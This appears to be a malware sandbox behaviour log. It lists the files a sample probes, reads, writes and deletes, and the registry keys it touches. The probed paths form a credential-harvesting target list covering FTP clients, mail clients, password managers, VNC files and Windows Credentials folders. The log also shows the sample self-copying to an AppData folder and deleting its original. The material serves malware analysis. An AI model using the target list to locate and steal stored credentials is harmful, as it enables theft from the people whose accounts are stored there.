C:\Users\Seven01\AppData\Roaming\iterate_GmbH
C:\Users\Seven01\.config\fullsync\profiles.xml
C:\Users\Seven01\AppData\Roaming\FTPInfo\ServerList.xml
C:\Users\Seven01\AppData\Roaming\FTPInfo\ServerList.cfg
C:\Program Files (x86)\FileZilla\Filezilla.xml
C:\Users\Seven01\AppData\Roaming\FileZilla\filezilla.xml
C:\Users\Seven01\AppData\Roaming\FileZilla\recentservers.xml
C:\Users\Seven01\AppData\Roaming\FileZilla\sitemanager.xml
C:\Program Files (x86)\Staff-FTP\sites.ini
C:\Users\Seven01\AppData\Roaming\BlazeFtp\site.dat
C:\Program Files (x86)\Fastream NETFile\My FTP Links
C:\Program Files (x86)\GoFTP\settings\Connections.txt
C:\Users\Seven01\AppData\Roaming\Estsoft\ALFTP\ESTdb2.dat
C:\Program Files (x86)\DeluxeFTP\sites.xml
C:\Windows\wcx_ftp.ini
C:\Users\Seven01\AppData\Roaming\wcx_ftp.ini
C:\Users\Seven01\wcx_ftp.ini
C:\Users\Seven01\AppData\Roaming\GHISLER\wcx_ftp.ini
C:\Program Files (x86)\FTPGetter\Profile\servers.xml
C:\Users\Seven01\AppData\Roaming\FTPGetter\servers.xml
C:\Program Files (x86)\WS_FTP\WS_FTP.INI
C:\Windows\WS_FTP.INI
C:\Users\Seven01\AppData\Roaming\Ipswitch
C:\Users\Seven01\site.xml
C:\Users\Seven01\AppData\Local\PokerStars*
C:\Users\Seven01\AppData\Local\ExpanDrive
C:\Users\Seven01\AppData\Roaming\Steed\bookmarks.txt
C:\Users\Seven01\AppData\Roaming\FlashFXP
C:\ProgramData\FlashFXP
C:\Users\Seven01\AppData\Local\INSoftware\NovaFTP\NovaFTP.db
C:\Users\Seven01\AppData\Roaming\NetDrive\NDSites.ini
C:\Users\Seven01\AppData\Roaming\NetDrive2\drives.dat
C:\ProgramData\NetDrive2\drives.dat
C:\Users\Seven01\AppData\Roaming\SmartFTP
C:\Users\Seven01\AppData\Roaming\Far Manager\Profile\PluginsData\42E4AEB1-A230-44F4-B33C-F195BB654931.db
C:\Users\Seven01\Documents\*.tlp
C:\Users\Seven01\Documents\*.bscp
C:\Users\Seven01\Documents\*.vnc
C:\Users\Seven01\Desktop\*.vnc
C:\Users\Seven01\Documents\mSecure
C:\ProgramData\Syncovery
C:\Program Files (x86)\FreshWebmaster\FreshFTP\FtpSites.SMF
C:\Users\Seven01\AppData\Roaming\BitKinex\bitkinex.ds
C:\Users\Seven01\AppData\Roaming\UltraFXP\sites.xml
C:\Users\Seven01\AppData\Roaming\FTP Now\sites.xml
C:\Program Files (x86)\Odin Secure FTP Expert\QFDefault.QFQ
C:\Program Files (x86)\Odin Secure FTP Expert\SiteInfo.QFP
C:\Program Files (x86)\Foxmail\mail
C:\Foxmail*
C:\Users\Seven01\AppData\Roaming\Pocomail\accounts.ini
C:\Users\Seven01\Documents\Pocomail\accounts.ini
C:\Users\Seven01\AppData\Roaming\GmailNotifierPro\ConfigData.xml
C:\Users\Seven01\AppData\Roaming\DeskSoft\CheckMail
C:\Program Files (x86)\WinFtp Client\Favorites.dat
C:\Windows\32BitFtp.TMP
C:\Windows\32BitFtp.ini
C:\FTP Navigator\Ftplist.txt
C:\Softwarenetz\Mailing\Daten\mailing.vdt
C:\Users\Seven01\AppData\Roaming\Opera Mail\Opera Mail\wand.dat
C:\Users\Seven01\Documents\*Mailbox.ini
C:\Users\Seven01\Documents\yMail2\POP3.xml
C:\Users\Seven01\Documents\yMail2\SMTP.xml
C:\Users\Seven01\Documents\yMail2\Accounts.xml
C:\Users\Seven01\Documents\yMail\ymail.ini
C:\Users\Seven01\AppData\Roaming\TrulyMail\Data\Settings\user.config
C:\Users\Seven01\Documents\*.spn
C:\Users\Seven01\Desktop\*.spn
C:\Users\Seven01\AppData\Roaming\To-Do DeskList\tasks.db
C:\Users\Seven01\AppData\Roaming\stickies\images
C:\Users\Seven01\AppData\Roaming\stickies\rtf
C:\Users\Seven01\AppData\Roaming\NoteFly\notes
C:\Users\Seven01\AppData\Roaming\Conceptworld\Notezilla\Notes8.db
C:\Users\Seven01\AppData\Roaming\Microsoft\Sticky Notes\StickyNotes.snt
C:\Users\Seven01\Documents
C:\Users\Seven01\Documents\*.kdbx
C:\Users\Seven01\Desktop
C:\Users\Seven01\Desktop\*.kdbx
C:\Users\Seven01\Documents\*.kdb
C:\Users\Seven01\Desktop\*.kdb
C:\Users\Seven01\Documents\Enpass
C:\Users\Seven01\Documents\My RoboForm Data
C:\Users\Seven01\Documents\1Password
C:\Users\Seven01\AppData\Local\Temp\Mikrotik\Winbox
C:\Users\Seven01\AppData\Local\Temp\NETAPI32.DLL
C:\Windows\System32\netapi32.dll
C:\Users\Seven01\AppData\Local\Temp\netutils.dll
C:\Windows\System32\netutils.dll
C:\Users\Seven01\AppData\Local\Temp\srvcli.dll
C:\Windows\System32\srvcli.dll
C:\Users\Seven01\AppData\Roaming\E62877
C:\Users\Seven01\AppData\Roaming\E62877\73E4A9.lck
C:\Users\Seven01\AppData\Roaming\Microsoft\Credentials
C:\Users\Seven01\AppData\Roaming\Microsoft\Credentials\*
C:\Users\Seven01\AppData\Local\Microsoft\Credentials
C:\Users\Seven01\AppData\Local\Microsoft\Credentials\*
C:\Users\Seven01\AppData\Roaming\E62877\73E4A9.exe
C:\Windows\Temp
C:\Windows\sysnative\LogFiles\Scm\c016366b-7126-46ca-b36b-592a3d95a60b
C:\Windows\sysnative\LogFiles\Scm\046fbef8-2dd6-4a92-a08e-608464edcc44
C:\Windows\sysnative\LogFiles\Scm\2f57269b-1e09-4e2d-ab1e-b0fdac7d279c
C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp
C:\Windows\ServiceProfiles
C:\Windows\ServiceProfiles\LocalService
C:\Windows\sysnative\Tasks\Microsoft\Windows\WDI\ResolutionHost
C:\Windows\sysnative\LogFiles\Scm\9435f817-fed2-454e-88cd-7f78fda62c48
C:\Windows\sysnative\LogFiles\Scm\994c86ad-a929-4b2c-88a0-4e25a107a029
C:\Windows\sysnative\LogFiles\Scm\044a6734-e90e-4f8f-b357-b2dc8ab3b5ec
C:\Windows\sysnative\Tasks\Microsoft\Windows\Time Synchronization\SynchronizeTime
C:\Windows\sysnative\LogFiles\Scm\47536d45-eeec-4bdc-8183-a4dc1f8da9e4
C:\Windows\sysnative\LogFiles\Scm\5c0aeeea-c154-45be-8499-bea5f11baff6
C:\Windows\sysnative\LogFiles\Scm\a7c73732-9f11-4281-8d19-764d4ec9d94d
C:\Windows\sysnative\LogFiles\Scm\ac4e5acf-89f7-4220-ba21-81ee183975e2
C:\Windows\sysnative\LogFiles\Scm\b4bdb6a0-417f-4e60-a0ac-aa00b1c79b4c
C:\Windows\sysnative\LogFiles\Scm\be669c13-8165-4536-96d0-6d6c39292aae
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache-System.dat
C:\Windows\Fonts\arial.ttf
C:\Windows\Fonts\ariali.ttf
C:\Windows\Fonts\arialbd.ttf
C:\Windows\Fonts\arialbi.ttf
C:\Windows\Fonts\batang.ttc
C:\Windows\Fonts\cour.ttf
C:\Windows\Fonts\couri.ttf
C:\Windows\Fonts\courbd.ttf
C:\Windows\Fonts\courbi.ttf
C:\Windows\Fonts\daunpenh.ttf
C:\Windows\Fonts\dokchamp.ttf
C:\Windows\Fonts\estre.ttf
C:\Windows\Fonts\euphemia.ttf
C:\Windows\Fonts\gautami.ttf
C:\Windows\Fonts\gautamib.ttf
C:\Windows\Fonts\Vani.ttf
C:\Windows\Fonts\Vanib.ttf
C:\Windows\Fonts\gulim.ttc
C:\Windows\Fonts\impact.ttf
C:\Windows\Fonts\iskpota.ttf
C:\Windows\Fonts\iskpotab.ttf
C:\Windows\Fonts\kalinga.ttf
C:\Windows\Fonts\kalingab.ttf
C:\Windows\Fonts\kartika.ttf
C:\Windows\Fonts\kartikab.ttf
C:\Windows\Fonts\KhmerUI.ttf
C:\Windows\Fonts\KhmerUIb.ttf
C:\Windows\Fonts\LaoUI.ttf
C:\Windows\Fonts\LaoUIb.ttf
C:\Windows\Fonts\latha.ttf
C:\Windows\Fonts\lathab.ttf
C:\Windows\Fonts\lucon.ttf
C:\Windows\Fonts\malgun.ttf
C:\Windows\Fonts\malgunbd.ttf
C:\Windows\Fonts\mangal.ttf
C:\Windows\Fonts\mangalb.ttf
C:\Windows\Fonts\meiryo.ttc
C:\Windows\Fonts\meiryob.ttc
C:\Windows\Fonts\himalaya.ttf
C:\Windows\Fonts\msjh.ttf
C:\Windows\Fonts\msjhbd.ttf
C:\Windows\Fonts\msyh.ttf
C:\Windows\Fonts\msyhbd.ttf
C:\Windows\Fonts\mingliu.ttc
C:\Windows\Fonts\mingliub.ttc
C:\Windows\Fonts\monbaiti.ttf
C:\Windows\Fonts\msgothic.ttc
C:\Windows\Fonts\msmincho.ttc
C:\Windows\Fonts\mvboli.ttf
C:\Windows\Fonts\ntailu.ttf
C:\Windows\Fonts\ntailub.ttf
C:\Windows\Fonts\nyala.ttf
C:\Windows\Fonts\phagspa.ttf
C:\Windows\Fonts\phagspab.ttf
C:\Windows\Fonts\plantc.ttf
C:\Windows\Fonts\raavi.ttf
C:\Windows\Fonts\raavib.ttf
C:\Windows\Fonts\segoesc.ttf
C:\Windows\Fonts\segoescb.ttf
C:\Windows\Fonts\segoeui.ttf
C:\Windows\Fonts\segoeuib.ttf
C:\Windows\Fonts\segoeuii.ttf
C:\Windows\Fonts\segoeuiz.ttf
C:\Windows\Fonts\seguisb.ttf
C:\Windows\Fonts\segoeuil.ttf
C:\Windows\Fonts\seguisym.ttf
C:\Windows\Fonts\shruti.ttf
C:\Windows\Fonts\shrutib.ttf
C:\Windows\Fonts\simsun.ttc
C:\Windows\Fonts\simsunb.ttf
C:\Windows\Fonts\sylfaen.ttf
C:\Windows\Fonts\taile.ttf
C:\Windows\Fonts\taileb.ttf
C:\Windows\Fonts\times.ttf
C:\Windows\Fonts\timesi.ttf
C:\Windows\Fonts\timesbd.ttf
C:\Windows\Fonts\timesbi.ttf
C:\Windows\Fonts\tunga.ttf
C:\Windows\Fonts\tungab.ttf
C:\Windows\Fonts\vrinda.ttf
C:\Windows\Fonts\vrindab.ttf
C:\Windows\Fonts\Shonar.ttf
C:\Windows\Fonts\Shonarb.ttf
C:\Windows\Fonts\msyi.ttf
C:\Windows\Fonts\tahoma.ttf
C:\Windows\Fonts\tahomabd.ttf
C:\Windows\Fonts\micross.ttf
C:\Windows\Fonts\angsa.ttf
C:\Windows\Fonts\angsai.ttf
C:\Windows\Fonts\angsab.ttf
C:\Windows\Fonts\angsaz.ttf
C:\Windows\Fonts\aparaj.ttf
C:\Windows\Fonts\aparajb.ttf
C:\Windows\Fonts\aparajbi.ttf
C:\Windows\Fonts\aparaji.ttf
C:\Windows\Fonts\cordia.ttf
C:\Windows\Fonts\cordiai.ttf
C:\Windows\Fonts\cordiab.ttf
C:\Windows\Fonts\cordiaz.ttf
C:\Windows\Fonts\ebrima.ttf
C:\Windows\Fonts\ebrimabd.ttf
C:\Windows\Fonts\gisha.ttf
C:\Windows\Fonts\gishabd.ttf
C:\Windows\Fonts\kokila.ttf
C:\Windows\Fonts\kokilab.ttf
C:\Windows\Fonts\kokilabi.ttf
C:\Windows\Fonts\kokilai.ttf
C:\Windows\Fonts\leelawad.ttf
C:\Windows\Fonts\leelawdb.ttf
C:\Windows\Fonts\msuighur.ttf
C:\Windows\Fonts\moolbor.ttf
C:\Windows\Fonts\symbol.ttf
C:\Windows\Fonts\utsaah.ttf
C:\Windows\Fonts\utsaahb.ttf
C:\Windows\Fonts\utsaahbi.ttf
C:\Windows\Fonts\utsaahi.ttf
C:\Windows\Fonts\vijaya.ttf
C:\Windows\Fonts\vijayab.ttf
C:\Windows\Fonts\wingding.ttf
C:\Windows\Fonts\modern.fon
C:\Windows\Fonts\roman.fon
C:\Windows\Fonts\script.fon
C:\Windows\Fonts\andlso.ttf
C:\Windows\Fonts\arabtype.ttf
C:\Windows\Fonts\simpo.ttf
C:\Windows\Fonts\simpbdo.ttf
C:\Windows\Fonts\simpfxo.ttf
C:\Windows\Fonts\majalla.ttf
C:\Windows\Fonts\majallab.ttf
C:\Windows\Fonts\trado.ttf
C:\Windows\Fonts\tradbdo.ttf
C:\Windows\Fonts\ahronbd.ttf
C:\Windows\Fonts\david.ttf
C:\Windows\Fonts\davidbd.ttf
C:\Windows\Fonts\frank.ttf
C:\Windows\Fonts\lvnm.ttf
C:\Windows\Fonts\lvnmbd.ttf
C:\Windows\Fonts\mriam.ttf
C:\Windows\Fonts\mriamc.ttf
C:\Windows\Fonts\nrkis.ttf
C:\Windows\Fonts\rod.ttf
C:\Windows\Fonts\simfang.ttf
C:\Windows\Fonts\simhei.ttf
C:\Windows\Fonts\simkai.ttf
C:\Windows\Fonts\angsau.ttf
C:\Windows\Fonts\angsaui.ttf
C:\Windows\Fonts\angsaub.ttf
C:\Windows\Fonts\angsauz.ttf
C:\Windows\Fonts\browa.ttf
C:\Windows\Fonts\browai.ttf
C:\Windows\Fonts\browab.ttf
C:\Windows\Fonts\browaz.ttf
C:\Windows\Fonts\browau.ttf
C:\Windows\Fonts\browaui.ttf
C:\Windows\Fonts\browaub.ttf
C:\Windows\Fonts\browauz.ttf
C:\Windows\Fonts\cordiau.ttf
C:\Windows\Fonts\cordiaub.ttf
C:\Windows\Fonts\cordiauz.ttf
C:\Windows\Fonts\cordiaui.ttf
C:\Windows\Fonts\upcdl.ttf
C:\Windows\Fonts\upcdi.ttf
C:\Windows\Fonts\upcdb.ttf
C:\Windows\Fonts\upcdbi.ttf
C:\Windows\Fonts\upcel.ttf
C:\Windows\Fonts\upcei.ttf
C:\Windows\Fonts\upceb.ttf
C:\Windows\Fonts\upcebi.ttf
C:\Windows\Fonts\upcfl.ttf
C:\Windows\Fonts\upcfi.ttf
C:\Windows\Fonts\upcfb.ttf
C:\Windows\Fonts\upcfbi.ttf
C:\Windows\Fonts\upcil.ttf
C:\Windows\Fonts\upcii.ttf
C:\Windows\Fonts\upcib.ttf
C:\Windows\Fonts\upcibi.ttf
C:\Windows\Fonts\upcjl.ttf
C:\Windows\Fonts\upcji.ttf
C:\Windows\Fonts\upcjb.ttf
C:\Windows\Fonts\upcjbi.ttf
C:\Windows\Fonts\upckl.ttf
C:\Windows\Fonts\upcki.ttf
C:\Windows\Fonts\upckb.ttf
C:\Windows\Fonts\upckbi.ttf
C:\Windows\Fonts\upcll.ttf
C:\Windows\Fonts\upcli.ttf
C:\Windows\Fonts\upclb.ttf
C:\Windows\Fonts\upclbi.ttf
C:\Windows\Fonts\kaiu.ttf
C:\Windows\Fonts\l_10646.ttf
C:\Windows\Fonts\ariblk.ttf
C:\Windows\Fonts\calibri.ttf
C:\Windows\Fonts\calibrii.ttf
C:\Windows\Fonts\calibrib.ttf
C:\Windows\Fonts\calibriz.ttf
C:\Windows\Fonts\cambria.ttc
C:\Windows\Fonts\cambriai.ttf
C:\Windows\Fonts\cambriab.ttf
C:\Windows\Fonts\cambriaz.ttf
C:\Windows\Fonts\Candara.ttf
C:\Windows\Fonts\Candarai.ttf
C:\Windows\Fonts\Candarab.ttf
C:\Windows\Fonts\Candaraz.ttf
C:\Windows\Fonts\comic.ttf
C:\Windows\Fonts\comicbd.ttf
C:\Windows\Fonts\consola.ttf
C:\Windows\Fonts\consolai.ttf
C:\Windows\Fonts\consolab.ttf
C:\Windows\Fonts\consolaz.ttf
C:\Windows\Fonts\constan.ttf
C:\Windows\Fonts\constani.ttf
C:\Windows\Fonts\constanb.ttf
C:\Windows\Fonts\constanz.ttf
C:\Windows\Fonts\corbel.ttf
C:\Windows\Fonts\corbeli.ttf
C:\Windows\Fonts\corbelb.ttf
C:\Windows\Fonts\corbelz.ttf
C:\Windows\Fonts\framd.ttf
C:\Windows\Fonts\framdit.ttf
C:\Windows\Fonts\Gabriola.ttf
C:\Windows\Fonts\georgia.ttf
C:\Windows\Fonts\georgiai.ttf
C:\Windows\Fonts\georgiab.ttf
C:\Windows\Fonts\georgiaz.ttf
C:\Windows\Fonts\pala.ttf
C:\Windows\Fonts\palai.ttf
C:\Windows\Fonts\palab.ttf
C:\Windows\Fonts\palabi.ttf
C:\Windows\Fonts\segoepr.ttf
C:\Windows\Fonts\segoeprb.ttf
C:\Windows\Fonts\trebuc.ttf
C:\Windows\Fonts\trebucit.ttf
C:\Windows\Fonts\trebucbd.ttf
C:\Windows\Fonts\trebucbi.ttf
C:\Windows\Fonts\verdana.ttf
C:\Windows\Fonts\verdanai.ttf
C:\Windows\Fonts\verdanab.ttf
C:\Windows\Fonts\verdanaz.ttf
C:\Windows\Fonts\webdings.ttf
C:\Windows\Fonts\coure.fon
C:\Windows\Fonts\serife.fon
C:\Windows\Fonts\sserife.fon
C:\Windows\Fonts\smalle.fon
C:\Windows\Fonts\smallf.fon
C:\PROGRAM FILES\COMMON FILES\MICROSOFT SHARED\EQUATION\MTEXTRA.TTF
C:\Windows\Fonts\ARIALUNI.TTF
C:\Windows\Fonts\CENTURY.TTF
C:\Windows\Fonts\WINGDNG2.TTF
C:\Windows\Fonts\WINGDNG3.TTF
C:\Windows\Fonts\BKANT.TTF
C:\Windows\Fonts\GOTHIC.TTF
C:\Windows\Fonts\OUTLOOK.TTF
C:\Windows\Fonts\TEMPSITC.TTF
C:\Windows\Fonts\MISTRAL.TTF
C:\Windows\Fonts\LHANDW.TTF
C:\Windows\Fonts\ITCKRIST.TTF
C:\Windows\Fonts\JUICE___.TTF
C:\Windows\Fonts\FREESCPT.TTF
C:\Windows\Fonts\ARIALN.TTF
C:\Windows\Fonts\GARA.TTF
C:\Windows\Fonts\MTCORSVA.TTF
C:\Windows\Fonts\ALGER.TTF
C:\Windows\Fonts\BASKVILL.TTF
C:\Windows\Fonts\BAUHS93.TTF
C:\Windows\Fonts\BELL.TTF
C:\Windows\Fonts\BRLNSB.TTF
C:\Windows\Fonts\BERNHC.TTF
C:\Windows\Fonts\BOD_PSTC.TTF
C:\Windows\Fonts\BRITANIC.TTF
C:\Windows\Fonts\BROADW.TTF
C:\Windows\Fonts\BRUSHSCI.TTF
C:\Windows\Fonts\CALIFR.TTF
C:\Windows\Fonts\CENTAUR.TTF
C:\Windows\Fonts\CHILLER.TTF
C:\Windows\Fonts\COLONNA.TTF
C:\Windows\Fonts\COOPBL.TTF
C:\Windows\Fonts\FTLTLT.TTF
C:\Windows\Fonts\HARLOWSI.TTF
C:\Windows\Fonts\HARNGTON.TTF
C:\Windows\Fonts\HTOWERT.TTF
C:\Windows\Fonts\JOKERMAN.TTF
C:\Windows\Fonts\KUNSTLER.TTF
C:\Windows\Fonts\LBRITE.TTF
C:\Windows\Fonts\LCALLIG.TTF
C:\Windows\Fonts\LFAX.TTF
C:\Windows\Fonts\MAGNETOB.TTF
C:\Windows\Fonts\MATURASC.TTF
C:\Windows\Fonts\MOD20.TTF
C:\Windows\Fonts\NIAGENG.TTF
C:\Windows\Fonts\NIAGSOL.TTF
C:\Windows\Fonts\OLDENGL.TTF
C:\Windows\Fonts\ONYX.TTF
C:\Windows\Fonts\PARCHM.TTF
C:\Windows\Fonts\PLAYBILL.TTF
C:\Windows\Fonts\POORICH.TTF
C:\Windows\Fonts\RAVIE.TTF
C:\Windows\Fonts\INFROMAN.TTF
C:\Windows\Fonts\SHOWG.TTF
C:\Windows\Fonts\SNAP____.TTF
C:\Windows\Fonts\STENCIL.TTF
C:\Windows\Fonts\VINERITC.TTF
C:\Windows\Fonts\VIVALDII.TTF
C:\Windows\Fonts\VLADIMIR.TTF
C:\Windows\Fonts\LATINWD.TTF
C:\Windows\Fonts\BOOKOS.TTF
C:\Windows\Fonts\ANTQUAB.TTF
C:\Windows\Fonts\ANTQUABI.TTF
C:\Windows\Fonts\ANTQUAI.TTF
C:\Windows\Fonts\GOTHICB.TTF
C:\Windows\Fonts\GOTHICBI.TTF
C:\Windows\Fonts\GOTHICI.TTF
C:\Windows\Fonts\BSSYM7.TTF
C:\Windows\Fonts\REFSAN.TTF
C:\Windows\Fonts\REFSPCL.TTF
C:\Windows\Fonts\ARIALNB.TTF
C:\Windows\Fonts\ARIALNBI.TTF
C:\Windows\Fonts\ARIALNI.TTF
C:\Windows\Fonts\GARABD.TTF
C:\Windows\Fonts\GARAIT.TTF
C:\Windows\Fonts\BELLB.TTF
C:\Windows\Fonts\BELLI.TTF
C:\Windows\Fonts\BRLNSDB.TTF
C:\Windows\Fonts\BRLNSR.TTF
C:\Windows\Fonts\CALIFB.TTF
C:\Windows\Fonts\CALIFI.TTF
C:\Windows\Fonts\HTOWERTI.TTF
C:\Windows\Fonts\LBRITED.TTF
C:\Windows\Fonts\LBRITEDI.TTF
C:\Windows\Fonts\LBRITEI.TTF
C:\Windows\Fonts\LFAXD.TTF
C:\Windows\Fonts\LFAXDI.TTF
C:\Windows\Fonts\LFAXI.TTF
C:\Windows\Fonts\BOOKOSB.TTF
C:\Windows\Fonts\BOOKOSBI.TTF
C:\Windows\Fonts\BOOKOSI.TTF
C:\Windows\Fonts\marlett.ttf
C:\Windows\sysnative\it-IT\radarrs.dll.mui
\??\PIPE\wkssvc
C:\Windows\sysnative\dfdts.dll
C:\Windows\sysnative\winevt\Logs\Microsoft-Windows-WindowsBackup%4ActionCenter.evtx
C:\Windows\sysnative\winevt\Logs\Microsoft-Windows-WindowsUpdateClient%4Operational.evtx
C:\Windows\sysnative\winevt\Logs\Microsoft-Windows-NetworkAccessProtection%4WHC.evtx
C:\Windows\sysnative\winevt\Logs\Microsoft-Windows-Windows Defender%4WHC.evtx
C:\Windows\sysnative\winevt\Logs\Microsoft-Windows-Diagnosis-Scheduled%4Operational.evtx
C:\Windows\sysnative\winevt\Logs\System.evtx
C:\Windows\sysnative\it-IT\KERNELBASE.dll.mui
C:\Windows\sysnative\dfdts.dll.manifest
C:\Windows\sysnative\dfdts.dll.123.Manifest
C:\Windows\sysnative\dfdts.dll.124.Manifest
C:\Windows\sysnative\dfdts.dll.2.Manifest
C:\Windows\sysnative\rundll32.exe
Read Files
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll C:\Users\Seven01\AppData\Local\Temp\212121212112.exe.config C:\Users\Seven01\AppData\Local\Temp\212121212112.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e\msvcr80.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch C:\Windows\assembly\NativeImages_v2.0.50727_32\index126.dat C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll C:\Windows\System32\l_intl.nls \Device\KsecDD C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll C:\Windows\assembly\pubpol36.dat C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp C:\Windows\Microsoft.NET\Framework\v2.0.50727\Culture.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\it\mscorrc.dll C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.dll C:\Windows\System32\netapi32.dll C:\Windows\System32\netutils.dll C:\Windows\System32\srvcli.dll C:\Users\Seven01\AppData\Roaming\E62877\73E4A9.lck C:\Windows\sysnative\LogFiles\Scm\c016366b-7126-46ca-b36b-592a3d95a60b C:\Windows\sysnative\LogFiles\Scm\046fbef8-2dd6-4a92-a08e-608464edcc44 C:\Windows\sysnative\LogFiles\Scm\2f57269b-1e09-4e2d-ab1e-b0fdac7d279c C:\Windows\sysnative\LogFiles\Scm\994c86ad-a929-4b2c-88a0-4e25a107a029 C:\Windows\sysnative\LogFiles\Scm\044a6734-e90e-4f8f-b357-b2dc8ab3b5ec C:\Windows\sysnative\LogFiles\Scm\47536d45-eeec-4bdc-8183-a4dc1f8da9e4 C:\Windows\sysnative\LogFiles\Scm\5c0aeeea-c154-45be-8499-bea5f11baff6 C:\Windows\sysnative\LogFiles\Scm\a7c73732-9f11-4281-8d19-764d4ec9d94d C:\Windows\sysnative\LogFiles\Scm\ac4e5acf-89f7-4220-ba21-81ee183975e2 C:\Windows\sysnative\LogFiles\Scm\b4bdb6a0-417f-4e60-a0ac-aa00b1c79b4c C:\Windows\sysnative\LogFiles\Scm\be669c13-8165-4536-96d0-6d6c39292aae C:\Windows\Globalization\Sorting\sortdefault.nls C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache-System.dat C:\Windows\Fonts\modern.fon C:\Windows\Fonts\roman.fon C:\Windows\Fonts\script.fon C:\Windows\Fonts\coure.fon C:\Windows\Fonts\serife.fon C:\Windows\Fonts\sserife.fon C:\Windows\Fonts\smalle.fon C:\Windows\Fonts\smallf.fon C:\Windows\sysnative\it-IT\radarrs.dll.mui \??\PIPE\wkssvc C:\Windows\sysnative\dfdts.dll C:\Windows\sysnative\winevt\Logs\Microsoft-Windows-WindowsUpdateClient%4Operational.evtx C:\Windows\sysnative\winevt\Logs\Microsoft-Windows-NetworkAccessProtection%4WHC.evtx C:\Windows\sysnative\winevt\Logs\Microsoft-Windows-Windows Defender%4WHC.evtx C:\Windows\sysnative\winevt\Logs\Microsoft-Windows-Diagnosis-Scheduled%4Operational.evtx C:\Windows\sysnative\it-IT\KERNELBASE.dll.mui C:\Windows\sysnative\dfdts.dll.123.Manifest C:\Windows\sysnative\dfdts.dll.124.Manifest C:\Windows\sysnative\dfdts.dll.2.Manifest C:\Windows\sysnative\rundll32.exe
Write Files
C:\Users\Seven01\AppData\Roaming\E62877\73E4A9.lck C:\Users\Seven01\AppData\Roaming\E62877\73E4A9.exe C:\Windows\sysnative\LogFiles\Scm\c016366b-7126-46ca-b36b-592a3d95a60b C:\Windows\sysnative\LogFiles\Scm\9435f817-fed2-454e-88cd-7f78fda62c48 C:\Windows\sysnative\LogFiles\Scm\044a6734-e90e-4f8f-b357-b2dc8ab3b5ec C:\Windows\sysnative\LogFiles\Scm\046fbef8-2dd6-4a92-a08e-608464edcc44 \??\PIPE\wkssvc C:\Windows\sysnative\winevt\Logs\Microsoft-Windows-WindowsUpdateClient%4Operational.evtx C:\Windows\sysnative\winevt\Logs\Microsoft-Windows-NetworkAccessProtection%4WHC.evtx C:\Windows\sysnative\winevt\Logs\Microsoft-Windows-Windows Defender%4WHC.evtx C:\Windows\sysnative\winevt\Logs\Microsoft-Windows-Diagnosis-Scheduled%4Operational.evtx
Delete Files
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2276.24146906 C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2276.24146906 C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2276.24147093 C:\Users\Seven01\AppData\Roaming\E62877\73E4A9.lck C:\Users\Seven01\AppData\Local\Temp\212121212112.exe
Keys
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\v4.0
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir
HKEY_CURRENT_USER\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR
Policy\Standards
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards\v2.0.50727
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots
